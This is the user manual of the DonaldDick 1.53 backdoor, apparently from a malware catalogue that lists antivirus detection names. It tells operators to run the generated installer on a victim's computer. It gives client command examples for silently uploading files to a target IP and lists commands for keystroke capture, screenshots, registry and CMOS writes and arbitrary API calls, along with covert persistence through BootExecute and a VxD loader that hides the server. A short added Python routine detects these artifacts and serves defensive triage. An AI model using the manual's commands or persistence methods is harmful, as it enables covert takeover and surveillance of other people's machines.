DonaldDick 1.53

Name: DonaldDick
Version: 1.53 (clients, server), 1.53a3 (server generator)
Author: BadMan Forever & Yaworsky
Language: Delphi (client), Watcom C++ (server)
Default port: n/a
Packed: not packed


                   Client GUI               Client CL                  Server                   Server generator
------------------ ------------------------ -------------------------- ------------------------ --------------------------
Name               ddcg153.exe              ddc153.exe                 dds153.exe               ddsetup.exe
(1) Size           662528 (01.10.1999)      12288 (13.09.1999)         169472 (28.09.1999)      -
(1) KAV detected   Backdoor.DonaldDick.153  Backdoor.DonaldDick.152.b  Backdoor.DonaldDick.135  -
(2) Size           662528 (06.10.1999)      12288 (13.09.1999)         -                        291328 (08.10.1999)
(2) KAV detected   Backdoor.DonaldDick.135  Backdoor.DonaldDick.135    -                        not detected (14.07.2002)

Client:

Features:

version 1.53a3: recent changes from 1.53a2:

bugfix: high 2 bytes of spx network number were lost,
        now network number is hex by default
Preliminary SmartMorph is used for executables (loaders are still defenceless)

Run ddsetup.exe, it will generate Donald Dick unique installable
file ddick.exe; run ddick.exe (you may rename it) on a computer you
want to f@#k and have fun.


version 1.53a2: recent changes from 1.53a1 version:

  commands that expect file names and paths now accept the following
  constants (anywhere in the string):
  ::SYSDIR - windows system directory
  ::WINDIR - windows directory
  ::TMPDIR - temporary directory
  ::PRGDIR - program files directory
  note that these directories also include the drive


version 1.53a1: recent changes from 1.53a version:

new commands:
  REGVAL1
  FREAD
  FWRITE

Command line parameters:

 
[ ...]

where
  : 0 - SPX, 1 - TCP
  : target address; TCP example: 127.0.0.1; SPX example: 22FA6700B
  : port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
  : d=N, where N is delay before execution, ms
    D=N, where N is delay after execution (has no meaning if repeat count is
         unspecified or 1), ms
    r=N, where N is repeat count (result is sent back for the last executed
         command only)
    p=X, where X is 32 characters of password; it is recommended that this
         option be the last one in the string
  : see below
  ...: parameters if required

examples:

get info (no password is required):
  client.exe 0 220482120A8 0 " " 0 info
  client.exe 1 212.20.33.8 " " 0 info
upload file (no password is required):
  client.exe 1 212.20.33.8 " " 0 upload "c:\program files\e.exe" e.exe
set binary value in the registry (no password is required):
  client.exe 0 220482120A8 0 " " 0 setregbin hklm\system\aaa test F01456
set system colors (no password is required):
  client.exe 0 220482120A8 0 " " 0 setcolors "2 3" "255 0 0 128 128 0"
open CDROM tray 10 times (assume that user will close it), delay before
execution 20 sec, after that - 120 s, no password is required:
  client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd
  client will wait for reply of the last command, it is long - you may
  ctrl-break it, the request will be executed anyway

Commands:

Server:      ECHO, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS, TERMINATE,
             TESTFAR, TESTNEAR, UNINSTALL, UPGRADE
Chat:        CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV
File system: CREATEDIR, DIR, DOWNLOAD, ERASE, GETDRIVES, RCOPY, REMOVEDIR,
             RENAME, SETFTEQ, SETFTIME, UPLOAD
Processes:   FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST,
             KILL, KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS,
             SUSPEND
Registry:    REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN, REGSETDWORD,
             REGSETSZ, REGVAL, REGSETVAL
System:      ANYCALL, GETTIME, LOGOFF, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
             SHUTDOWN, SPI, SYSINFO
Keyboard:    KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE
Windows:     CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, SCREENSHOT,
             SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT
Hardware:    RDCMOS, WRCMOS
Jokes:       CLOSECD, MONOFF, MONON, MSGBOX, OPENCD, PLAY

All:

ANYCALL [ [...]]
  -- not tested yet --
  Call any function - very cool but dangerous. Param may be immediate data
  (number or arrays) or may start with 'p'; in this case they are data and/or
  buffers which param points to. If param contains only 'p' then pointer is
  NULL. API function is called inside thread which processes the request.
  Flags:
    bit 0,1:  0 - use LoadLibrary( module name ), GetProcAddress( function name )
                  and perform near call,
              1 - use offset (selector must be any value) and perform near call,
              2 - use selector, offset and perform far call.
    bit 2:    params push order, 0 - right->left (C), 1 - left->right (PASCAL);
              if bits 4,5 are not zero then this bit is ignored.
    bit 3:    who removes params from the stack, 0 - caller, 1 - callee.
    bit 4,5:  register optimization (first params are passed in register set):
              0 - none,
              n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
              n/i 2 - Delphi, the set is EAX, EDX, ECX.
    bit 6:    how to pass return value buffer's address for arrays:
              0 - Watcom C - address is passed in ESI
              1 - Delphi, when register optimization is used - address is
                  passed in the last register in the set if parameters count
                  less than 3 or in the first position on the stack; if no
                  optimization is set in bits 4,5 then address is passed in
                  the first position on the stack
    bit 8-31: buffer size to allocate on the stack for the return value; if
              zero then return value is expected in EDX:EAX and bit 6 is
              ignored.

CHATCLR []
  Clears chat room; if non-volatile flag is nonzero then non-volatile chat
  room is cleared
CHATRD []
  Reads messages from chat room starting with index or all of them if index
  is 0 or none; message format: 
  index of message is incremented continuously since the first message in the
  chat room even if the room was cleared
CHATRDNV []
  same as CHATRD but operates with non-volatile room
CHATSIZE []
  Get/set chat room size, default size is 8K; chat room is cleared
CHATWR [...]
  Add message(s) to the chat room
CHATWRNV [...]
  same as CHATWR but operates with non-volatile room; non-volatile chat room
  is limited to 2K
CHILDWINDOWS
  Get child windows of window
CLOSECD
CREATEDIR [...]
  Note: returns as many result strings as parameters passed.
DIR
  Don't forget file mask!
DOWNLOAD
ECHO
  Server sends received packet back
ERASE < > [...< >]
  force flag: /0 or /1; /1 - erase file even if read only, or directory with
  all files and subdirectories.
  Note: returns as many strings as parameters passed.
FORGETALL
  Clears suspended thread table
GETCOLORS
  Get system colors
GETDRIVES
  Get list of drives
GETPCLASS
  Get priority class
GETPID
  Get server's process id
GETPROCLIST
  Get list of processes
GETSUSPTHR
  Get list of suspended threads in the form: 
GETTHRLIST
  Get list of threads for specified process
GETTIME
  Returns date and time
GETWINDOW
  Returns window handle(s) relative to the given window (see Win32 API
  documentation on GetWindow() for description)
HIDDEN <0/1>
  hidden mode on/off; in hidden mode server does not reply to any command if
  an error occurred before its processing (reception, password verification,
  function code verification)
  Returns current mode
HWNDDESKTOP
  Returns desktop window handle
INFO
  Returns some info
KEYBSAVE [<0/1>]
  not implemented
  without parameter or if that one is nonzero, saves current lookup table;
  if parameter is zero, clears saved table
KEYBUF [ []]
  Returns captured scan codes; if parameter is absent then returns last
  keystrokes; only the following scan codes are captured:
  02..1C, 1E..29, 2B..35, 37, 39, 47..53 and 9C, B5 - these codes denote
  extended keys with secondary scan codes 1C and 35
KEYMAP [ ...]
  Remaps keys and returns current map; this command sets elements in the
  lookup table; lookup table contains 256 scan codes in range 0..127; first
  half of table is used to remap regular keys, second one is used to remap
  extended keys (those keys produce two-byte scan codes, first code is E0);
  normally, elements at indexes 0 and 128 have code 0, at 1 and 129 - 1 and
  so on; key is disabled if code is 0; note that it is impossible to remap
  pause/break key
KEYSTROKE [...]
  simulates keystrokes
KILL [...]
  Note: returns as many result strings as parameters passed.
KILLBYNAME [...]
  Note: returns as many result strings as parameters passed.
KILLTHR [...]
  Kills thread(s) (under Win95 may not be done immediately)
  Note: returns as many result strings as thread ids passed.
LOGOFF
  Performs logoff for workstation
MONOFF
  Turns monitor off
MONON
  Turns monitor on
MSGBOX
  Displays message box, see below for the description of 
OPENCD
PLAY
PORT GET/[...]
  Get or set port numbers in registry, server must be restarted to apply
  changes; protocol name may be SPX or TCP;  is a number or D (default port);
  always returns port numbers
POWEROFF
  Performs power off
RCOPY [... ]
  Note: returns result string for each parameter pair.
RDCMOS
  Reads CMOS data, start - index in range 0..255
RAISE
  Raises an exception - for debug purposes only
REBOOT
REGDELK
  Deletes subkey from the registry
REGDELV
  Deletes value from subkey
REGISTER []
  Registers server
  Returns status in the first line, registration info in the second line,
  registration status in the third line if registration data is present
REGKEY
  Displays subkeys in key
REGNEWK
  Creates new subkey
REGSETBIN
  Sets binary value, value is the sequence of hex digits without any spaces
REGSETDWORD
  Sets DWORD value
REGSETSZ
  Sets string value
REGSETVAL
  Sets value of any type. Value is the sequence of hex digits without any
  spaces
REGVAL
  Key must contain "hklm", "hkus", "hkcu", "hkcr" first
REMOVEDIR [...]
  Note: returns as many result strings as parameters passed.
RENAME [... ]
  Note: returns result string for each parameter pair.
RESUME [...]
  Resumes thread(s)
  Note: returns as many result strings as thread ids passed.
RESUMEALL
  Resumes all suspended threads
RUN [...]
  Note: returns as many result strings as parameters passed.
SCREENSHOT [ [ [...]]]
SETCAPTION
SETCOLORS
SETCOMPNAME
SETFTEQU
  Sets date/time of file equal to reference file
SETFTIME
SETPASS []
  Sets or removes password
SETPCLASS
  Set priority class
SETTIME
SHUTDOWN
SPI []
  Get/set system parameters info
SUSPEND [...]
  Suspends thread(s) (under Win95 may not be done immediately; suspension
  means entering a continuous loop so the thread consumes cpu power)
  Note: returns as many result strings as thread ids passed.
SYSINFO
TERMINATE
  Server terminates itself
TESTFAR
  Returns far address of far test function - debug only
TESTNEAR
  Returns near address of near test function - debug only
UNINSTALL
  Completely uninstalls donald dick server
UPLOAD
UPGRADE
  restarts server anyway
WINDOWS
  Get window list
WINMSG
  params may be numbers or may start with 'p'; in this case they are data
  and/or buffers which lparam and/or wparam points to
WINSHOT [ [ [...]]]
  screenshot for the specified window or for the foreground window if handle
  is 0
WRCMOS

Files:

oleproc.exe  - main executable file
pnpmgr.pci   - executable file under Windows95/98
pmss.exe     - executable file under WindowsNT
vmldr.vxd    - Dick loader and thread manager for Windows95/98
bootexec.exe - Dick loader for WindowsNT
jpegcomp.dll - JPEG compressor (full version only)



Registry values are in:

  under Windows95/98: HKLM\System\CurrentControlSet\Services\VxD\VMLDR
  under WindowsNT:    HKLM\System\CurrentControlSet\Control\Session Manager

Type    Name        Description
------- ----------- --------------------
BINARY  Rqdata      registration data
BINARY  PData    (where  is the protocol designator) the sequence of
                    null-terminated strings, each string is the port (socket)
                    number or "D" to use default port (0x9014 for SPX,
                    23476 for TCP)
STRING  Psdata      password, always contains 32 characters



Installation:

When distribution file is launched:
1. kills existing Dick server
2. extracts the following files into system directory:
     under Windows95/98:
       oleproc.exe
       pnpmgr.pci
       vmldr.vxd
     under WindowsNT:
       oleproc.exe
       pmss.exe
       bootexec.exe
3. modifies registry
     under Windows95/98:
       creates VMLDR subkey in HKLM\System\CurrentControlSet\Services\VxD;
       creates necessary values in that subkey to load vmldr.vxd when
         the system starts up;
     under WindowsNT:
       adds string "bootexec.exe" to the BootExecute value in the subkey
         HKLM\System\CurrentControlSet\Control\Session Manager
4. creates PData0 and PData1 parameters with values
      'D',0,'0','x','9','0','1','5' and
      'D',0,'2','3','4','7','7'
5. extracts plugins:
     jpegcomp.dll (full version only)
6. spawns oleproc.exe



Loading:

1. Dick loader is launched by windows:
     NT:
       bootexec.exe, at the blue screen time
         loader creates the service to be launched later;
         the executable file of the service is oleproc.exe
     95/98:
       vmldr.vxd, init order is SHELL_INIT_ORDER+10
         loader calls Win32 ShellExecute service to spawn oleproc.exe;
         this VxD also may be loaded dynamically to perform thread management
         functions
2. oleproc.exe (launched by loader, installer or manually) kills
     existing Dick server, copies itself to:
       under WindowsNT:
         pmss.exe
       under Windows95/98:
         pnpmgr.pci
     and launches it;
     this is done to keep executable file closed to allow upgrades;
     during upgrade oleproc.exe is replaced by the new file and that file
     is launched immediately
3. pmss.exe under WindowsNT:
     stops oleproc.exe service and removes it (unfortunately, you may see
     this service for a short time if you quickly log on and open 'services'
     applet in the control panel)
   pnpmgr.pci under Windows95/98:
     hides itself

at the end of this process pmss.exe or pnpmgr.pci is the Donald Dick server
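A triage routine that checks a host snapshot for the registry and file artifacts listed under Registry values, Installation and Loading above. This is an added example, not code from the readme or the tool; the snapshot layout (a dict of exported registry values plus a system-directory file listing) and the function names are assumptions, and port strings are decoded with the decimal / leading-0 octal / 0x hex rule the string list format section gives.

```python
SPX, TCP = 0, 1                                  # protocol designators from the readme
DEFAULT_PORT = {SPX: 0x9014, TCP: 23476}         # what "D" means in a PData value
NT_KEY = r"HKLM\System\CurrentControlSet\Control\Session Manager"
W9X_KEY = r"HKLM\System\CurrentControlSet\Services\VxD\VMLDR"
DROPPED = {"oleproc.exe", "pnpmgr.pci", "pmss.exe", "vmldr.vxd", "bootexec.exe"}

def parse_number(text: str) -> int:
    """Readme number rule: first digit 1..9 decimal, leading 0 octal, 0x hex."""
    if text.lower().startswith("0x"):
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text[1:], 8)
    return int(text, 10)

def parse_pdata(raw: bytes, protocol: int) -> list[int]:
    """Decode a PData BINARY value: null-terminated port strings, "D" = default port."""
    ports = []
    for item in raw.split(b"\x00"):
        if item:                                 # skip the final terminator
            s = item.decode("ascii")
            ports.append(DEFAULT_PORT[protocol] if s == "D" else parse_number(s))
    return ports

def triage(snapshot: dict) -> dict:
    """Report DonaldDick artifacts found in a host snapshot (layout assumed here:
    {"registry": {key: {value name: data}}, "system_dir": [file names]})."""
    reg, findings = snapshot["registry"], {}
    boot = reg.get(NT_KEY, {}).get("BootExecute", [])
    if any(entry.strip().lower() == "bootexec.exe" for entry in boot):
        findings["nt_loader"] = "bootexec.exe listed in BootExecute"
    if W9X_KEY in reg:
        findings["w9x_loader"] = "VMLDR VxD subkey present"
    for key in (NT_KEY, W9X_KEY):                # port and password values live here
        vals = reg.get(key, {})
        for name, proto in (("PData0", SPX), ("PData1", TCP)):
            if name in vals:
                findings[name] = parse_pdata(vals[name], proto)
        if len(vals.get("Psdata", "")) == 32:    # password value is always 32 chars
            findings["password_set"] = True
    present = {f.lower() for f in snapshot["system_dir"]}
    findings["dropped_files"] = sorted(present & DROPPED)
    return findings

# Constructed sample: NT registry and system directory after the installer ran
SAMPLE = {
    "registry": {NT_KEY: {"BootExecute": ["autocheck autochk *", "bootexec.exe"],
                          "PData0": b"D\x000x9015\x00", "PData1": b"D\x0023477\x00"}},
    "system_dir": ["oleproc.exe", "pmss.exe", "bootexec.exe", "notepad.exe"],
}
```

Running `triage(SAMPLE)` reports the BootExecute loader entry, both port lists resolved to numbers, and the three dropped files; a clean host yields an empty file list and no loader findings.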




String list format:

command:

  1st string:  []
      function code and optional numbers may be decimal if first digit is 1..9,
      octal if first digit is 0 or hexadecimal if first digit is 0
      followed with x.
      options: d=N, where N is delay before execution, ms
               D=N, where N is delay after execution (has no meaning if repeat
                    count is unspecified or 1), ms
               r=N, where N is repeat count (result is sent back for the last
                    executed command only)
               p=X, where X is 32 characters of password; it is recommended
                    that this option be the last one in the string
  2nd string: 
  ...
  Nth string: 

reply:

  1st string:    []
  2nd string: 
  ...
  Nth string: 